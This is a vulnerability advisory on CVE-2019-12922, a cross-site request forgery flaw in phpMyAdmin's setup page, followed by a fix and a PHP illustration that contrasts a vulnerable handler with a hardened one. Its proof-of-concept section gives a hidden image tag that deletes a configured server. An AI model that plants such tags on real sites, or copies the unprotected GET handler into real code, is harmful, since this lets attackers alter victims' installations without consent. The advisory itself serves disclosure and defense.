CVE-2019-12922: phpMyAdmin zero-day cross-site request forgery vulnerability alert

phpMyAdmin is a free software tool written in PHP for managing MySQL or MariaDB database servers. It can be used to perform most administrative tasks, including creating databases, running queries and adding user accounts.

A cross-site request forgery (CSRF) vulnerability has been found in phpMyAdmin's setup page: an attacker who lures a logged-in user to a page he controls can delete any configured server entry from the phpMyAdmin setup. The attacker only has to craft a fake hyperlink or hidden image whose URL is the request he wants issued on the user's behalf; because the state-changing action is performed through a plain GET request with no anti-CSRF token, the browser sends it, together with the user's session cookie, without any further interaction. The CSRF is thus possible because of the incorrect use of the HTTP method.

CVE-2019-12922: phpMyAdmin 4.9.0.1 - CSRF

Affected versions

  • phpMyAdmin <= 4.9.0.1

Proof of concept

Exploit CSRF - Deleting the main server (server id 1)

A hidden image tag placed on any attacker-controlled page is enough; the victim's browser requests the URL and includes the phpMyAdmin session cookie:

<p>Deleting Server 1</p>
<img src="http://server/phpmyadmin/setup/index.php?page=servers&mode=remove&id=1" style="display:none;" />

Solution

Implement an anti-CSRF token that is checked on every request, as is already done for the other phpMyAdmin requests, and perform state-changing actions only via POST rather than GET. Upgrade to phpMyAdmin 4.9.1 or later, which contains the fix. Independently of the fix, the setup/ directory is only needed to generate config.inc.php and should not be reachable on a production install.
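The following is an added illustration, not phpMyAdmin's own code, of the weak pattern exploited above beside a hardened version of the same "remove server" action. It models the endpoint as two small PHP functions; the server array, the function names and the token field name are hypothetical, and the hardened version applies the two countermeasures named in the solution: the action only runs on POST and only when a per-session random token matches, compared in constant time with hash_equals().

```php
<?php
// Added example, not phpMyAdmin's code. Models a simplified setup
// "remove server" endpoint: first the weak pattern (state change on a GET
// request with no per-session token, which is what makes the hidden <img>
// PoC work), then a hardened version. Names are hypothetical.

session_start();

/** Issue (or reuse) a random per-session anti-CSRF token. */
function csrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/**
 * Weak: any request with mode=remove&id=N deletes a server entry.
 * A hidden <img src="...?page=servers&mode=remove&id=1"> on an attacker's
 * page issues exactly this request with the victim's session cookie attached.
 */
function removeServerVulnerable(array &$servers, array $query): bool
{
    if (($query['mode'] ?? '') !== 'remove') {
        return false;
    }
    $id = (int) ($query['id'] ?? 0);
    if (!isset($servers[$id])) {
        return false;
    }
    unset($servers[$id]);
    return true;
}

/**
 * Hardened: require POST and a token equal to the session's token.
 * A cross-site <img> or <a> can only produce a GET, and a cross-site form
 * cannot read the victim's session token, so the forged request is refused.
 */
function removeServerHardened(array &$servers, string $method, array $post): bool
{
    if ($method !== 'POST' || ($post['mode'] ?? '') !== 'remove') {
        return false;
    }
    $sent = (string) ($post['token'] ?? '');
    if ($sent === '' || !hash_equals(csrfToken(), $sent)) {
        http_response_code(403);
        return false;
    }
    $id = (int) ($post['id'] ?? 0);
    if (!isset($servers[$id])) {
        return false;
    }
    unset($servers[$id]);
    return true;
}

// Constructed demo data: two configured servers.
$servers = [1 => ['host' => 'db1.example'], 2 => ['host' => 'db2.example']];

// The forged GET parameters from the PoC: the weak handler deletes server 1.
$forged = ['page' => 'servers', 'mode' => 'remove', 'id' => '1'];
$copy = $servers;
var_dump(removeServerVulnerable($copy, $forged), array_keys($copy));

// The same parameters replayed as a POST without a token are rejected (403).
$copy = $servers;
var_dump(removeServerHardened($copy, 'POST', $forged), array_keys($copy));

// A legitimate form submission carrying the session token succeeds.
$copy = $servers;
$legit = $forged + ['token' => csrfToken()];
var_dump(removeServerHardened($copy, 'POST', $legit), array_keys($copy));

// The form a trusted page would render, with the token as a hidden field.
echo '<form method="post" action="setup/index.php">'
   . '<input type="hidden" name="page" value="servers">'
   . '<input type="hidden" name="mode" value="remove">'
   . '<input type="hidden" name="id" value="1">'
   . '<input type="hidden" name="token" value="'
   . htmlspecialchars(csrfToken(), ENT_QUOTES) . '">'
   . '<button>Remove server 1</button></form>', PHP_EOL;
```

Run it from the command line with `php csrf_demo.php`. The token is bound to the session, so it must be regenerated when the session is created or the user re-authenticates, and it must never be placed in a URL where it could leak through the Referer header.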

Via: packetstormsecurity


Origin www.linuxidc.com/Linux/2019-09/160657.htm